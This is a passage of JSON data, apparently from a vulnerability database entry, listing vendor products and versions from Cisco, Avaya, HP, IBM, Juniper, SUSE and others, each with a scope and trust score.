"eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "telepresence endpoints ex series", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "telepresence endpoints c series", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "telepresence endpoints 10\" touch panel", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "ironport encryption appliance", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "application policy infrastructure controller", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "autobackup server", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "asa cx and cisco prime security manager", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "application networking manager", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "application and content networking system", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "centos", "scope": "eq", "trust": 0.6, "vendor": "centos", "version": "7" }, { "model": "centos", "scope": "eq", "trust": 0.6, "vendor": "centos", "version": "5" }, { "model": "proactive contact", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "5.1" }, { "model": "proactive contact", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "5.0" }, { "model": "one-x client enablement services sp2", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.2" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.2" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.1.2" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.1.1" }, { "model": "message networking", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.3" }, { "model": "message networking", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.2.0" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "5.2" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "5.1" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "5.0" }, { "model": "iq", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "5.1.1" }, { "model": "iq", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "5.1" }, { "model": "iq", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "5" }, { "model": "ip office application server", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "8.1" }, { "model": "ip office application server", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "8.0" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "7.5" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "7.0" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "7.5" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "7.0" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "7.5" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "7.0" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "7.5" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "7.0" }, { "model": "aura system platform", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.2.1" }, { "model": "aura system platform", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.0.2" }, { "model": "aura system platform", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.0.1" }, { "model": "aura system platform", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.3" }, { "model": "aura system platform", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.2.1.0.9" }, { "model": "aura system platform sp1", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.2" }, { "model": "aura system platform", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.2" }, { "model": "aura system platform", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.0.3.9.3" }, { "model": "aura system platform", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.0.3.8.3" }, { "model": "aura system platform", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.0.3.0.3" }, { "model": "aura system platform sp3", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.0" }, { "model": "aura system platform sp2", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.0" }, { "model": "aura system platform", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.0" }, { "model": "aura system manager", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.3" }, { "model": "aura system manager sp3", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.2" }, { "model": "aura system manager", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.2" }, { "model": "aura system manager", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.1.5" }, { "model": "aura system manager", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.1.3" }, { "model": "aura system manager", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.1.2" }, { "model": "aura system manager", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.1.1" }, { "model": "aura system manager sp2", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.1" }, { "model": "aura system manager sp1", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.1" }, { "model": "aura system manager", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.1" }, { "model": "aura system manager sp1", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.0" }, { "model": "aura system manager", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.2.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.1.5" }, { "model": "aura session manager", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.1.3" }, { "model": "aura session manager", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.1.2" }, { "model": "aura session manager", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.1.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.0.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.3" }, { "model": "aura session manager", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.2.2" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.2" }, { "model": "aura session manager", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.2" }, { "model": "aura session manager sp2", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.1" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.1" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.0" }, { "model": "aura presence services", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.1.2" }, { "model": "aura presence services", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.1.1" }, { "model": "aura presence services sp1", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.1" }, { "model": "aura presence services", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.1" }, { "model": "aura presence services", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.0" }, { "model": "aura conferencing", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "7.0" }, { "model": "aura conferencing standard", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.0" }, { "model": "aura conferencing sp1 standard", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.0" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.3" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.2" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.0.1" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.0" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "53003.0" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "53002.0" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.1.2" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.1.1" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.1" }, { "model": "network time protocol", "scope": "ne", "trust": 0.6, "vendor": "meinberg", "version": "4.2.8" }, { "model": "junos os 14.2r3", "scope": "ne", "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "junos os 14.1x55-d16", "scope": "ne", "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "junos os 14.1x50-d90", "scope": "ne", "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "junos os 14.1r5", "scope": "ne", "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "junos os 13.3r6", "scope": "ne", "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "junos os 13.2r8", "scope": "ne", "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "junos os 12.3x48-d15", "scope": "ne", "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "junos os 12.3r9", "scope": "ne", "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "junos os 12.1x47-d20", "scope": "ne", "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "junos os 12.1x46-d35", "scope": "ne", "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "junos os 12.1x44-d50", "scope": "ne", "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "smartcloud entry fp", "scope": "ne", "trust": 0.6, "vendor": "ibm", "version": "3.110" }, { "model": "vcx", "scope": "ne", "trust": 0.6, "vendor": "hp", "version": "9.8.17" }, { "model": "vipr srm", "scope": "ne", "trust": 0.6, "vendor": "emc", "version": "3.6.1" }, { "model": "m\u0026r 6.5u1", "scope": "ne", "trust": 0.6, "vendor": "emc", "version": null }, { "model": "linux enterprise server sp2 ltss", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "110" }, { "model": "linux enterprise server sp3 for vmware", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "linux enterprise server sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "linux enterprise server sp4 ltss", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "linux enterprise desktop sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "opensuse evergreen", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11.4" }, { "model": "linux enterprise server", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "12" }, { "model": "linux enterprise desktop", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "12" }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "13.2" }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "13.1" }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "12.3" }, { "model": "solaris", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.2" }, { "model": "solaris", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1" }, { "model": "solaris", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "10" }, { "model": "real-time compression appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.8" }, { "model": "real-time compression appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.9" }, { "model": "infosphere guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "infosphere guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "infosphere guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "flex system p460 compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7895-43x)0" }, { "model": "flex system p460", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7895-42x)0" }, { "model": "flex system p270 compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7954-24x)0" }, { "model": "flex system p260 compute node /fc efd9", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "flex system p260", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7895-23x)0" }, { "model": "flex system p260", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7895-22x)0" }, { "model": "flex system p24l", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.2" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.1" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.1" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.1" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0" }, { "model": "wx5004-ei (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "u200s and cs (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "u200a and m (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "secblade iii (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "secblade fw (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "msr50 g2", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5-0" }, { "model": "msr50", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5-0" }, { "model": "msr30-1x", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5-0" }, { "model": "msr30-16", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5-0" }, { "model": "msr30", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5-0" }, { "model": "msr20-1x (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "msr20-1x", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5-0" }, { "model": "msr20 (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "msr1000 (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "msr (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9xx5)0" }, { "model": "msr (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "93x5)0" }, { "model": "msr 50-g2 (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "msr (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "505)0" }, { "model": "msr (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "30-1x5)0" }, { "model": "msr (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "30-165)0" }, { "model": "msr (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "305)0" }, { "model": "hsr6800 (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "hsr6602 (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "hp870 (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "hp850 (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "hp830 (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "hp6000 (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "f5000-c/s (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "f5000-a (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "f1000-s-ei (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "f1000-e (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "f1000-a-ei (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "a6600 (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "9500e (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "(comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "88005)0" }, { "model": "(comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "75005)0" }, { "model": "(comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "58305)0" }, { "model": "(comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "58205)0" }, { "model": "(comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "58005)0" }, { "model": "5500si (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "hi (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "55005)0" }, { "model": "ei (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "55005)0" }, { "model": "si (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "51205)0" }, { "model": "ei (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "51205)0" }, { "model": "4800g (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "4500g (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "4210g (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "(comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "36105)0" }, { "model": "(comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3600v25)0" }, { "model": "(comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3100v2-485)0" }, { "model": "(comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3100v25)0" }, { "model": "(comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "125005)0" }, { "model": "(comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "105005)0" }, { "model": "enterprise server ap8800", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0" }, { "model": "enterprise server ap7000", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0" }, { "model": "bladesymphony cb500 series", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0" }, { "model": "bladesymphony cb320 series", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0" }, { "model": "bladesymphony cb2500 series", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0" }, { "model": "bladesymphony cb2000 series", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0" }, { "model": "bladesymphony bs500 series", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0" }, { "model": "bladesymphony bs320 series", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0" }, { "model": "bladesymphony bs2500 series", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0" }, { "model": "bladesymphony bs2000 series", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0" }, { "model": "bladesymphony bs1000 series", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0" }, { "model": "load balancer big-ip1500", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "0" }, { "model": "telepresence profile series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.1" }, { "model": "ip office application server sp", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.02" }, { "model": "ip office application server sp", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.01" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "cms r17", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.3" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "aura experience portal sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura experience portal sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura conferencing", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.0" }, { "model": "aura collaboration environment", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "3.0" }, { "model": "aura collaboration environment", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.9.5" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.5" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.10.1" }, { "model": "wx5004-ei (comware r2507p35", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "vsr (comware r0204p01", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7)" }, { "model": "(comware r1513p95", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "v19105)" }, { "model": "u200s and cs (comware f5123p31", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "u200a and m (comware f5123p31", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "smb1920 (comware r1106", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "smb1910 (comware r1108", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "smb (comware r1105", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "16205)" }, { "model": "secblade iii (comware r3820p03", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "secblade fw (comware r3181p05", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "msr50 ru r2513l61", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5" }, { "model": "msr50 g2 r2513l61", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5-" }, { "model": "msr50 epu ru r2513l61", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5" }, { "model": "msr50 r2513l61", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5-" }, { "model": "msr4000 (comware r0106p31", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7)" }, { "model": "msr316 ru r2513l61", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5" }, { "model": "msr301x ru r2513l61", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5" }, { "model": "msr3000 (comware r0106p31", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7)" }, { "model": "msr30-1x r2513l61", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5-" }, { "model": "msr30-16 r2513l61", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5-" }, { "model": "msr30 ru r2513l61", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5" }, { "model": "msr30 r2513l61", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5-" }, { "model": "msr2000 (comware r0106p31", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7)" }, { "model": "msr20-1x ru r2513l61", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5" }, { "model": "msr20-1x (comware r2513p45", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "msr20-1x r2513l61", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5-" }, { "model": "msr20 ru r2513l61", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5" }, { "model": "msr20 (comware r2513p45", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "msr20 r2513l61", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5-" }, { "model": "msr1000 ru r2513l61", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5" }, { "model": "msr1000 (comware r0106p31", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7)" }, { "model": "msr1000 (comware r2513p45", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "msr (comware r2513p45", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "9xx5)" }, { "model": "msr (comware r2513p45", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "93x5)" }, { "model": "msr 50-g2 (comware r2513p45", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "msr (comware r2513p45", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "505)" }, { "model": "msr (comware r2513p45", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "30-1x5)" }, { "model": "msr (comware r2513p45", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "30-165)" }, { "model": "msr (comware r2513p45", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "305)" }, { "model": "hsr6800 ru r3303p18", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5" }, { "model": "hsr6800 (comware r3303p18", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "hsr6602 ru r3303p18", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5" }, { "model": "hsr6602 (comware r3303p18", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "hp870 (comware r2607p35", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "hp850 (comware r2607p35", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "hp830 (comware r3507p35", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "hp6000 (comware r2507p35", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "f5000-c/s (comware r3811p03", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "f5000-a (comware f3210p23", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "f1000-s-ei (comware r3734p06", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "f1000-e (comware r3181p05", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "f1000-a-ei (comware r3734p06", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "a6600 (comware r3303p18", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "9500e (comware r1828p06", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "(comware r3627p04", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "88005)" }, { "model": "(comware r2122", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "79007)" }, { "model": "(comware r6708p10", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "75005)" }, { "model": "ru r3303p18", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "66025" }, { "model": "rse ru r3303p18", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "66005" }, { "model": "rpe ru r3303p18", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "66005" }, { "model": "(comware r2311p06", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "59207)" }, { "model": "(comware r2311p06", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "59007)" }, { "model": "(comware r1118p11", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "58305)" }, { "model": "(comware r1809p03", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "58205)" }, { "model": "(comware r7006p12", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "58007)" }, { "model": "(comware r1809p03", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "58005)" }, { "model": "(comware r2311p06", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "57007)" }, { "model": "5500si (comware r2221p08", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "hi (comware r5501p06", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "55005)" }, { "model": "(comware r3108p03", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": 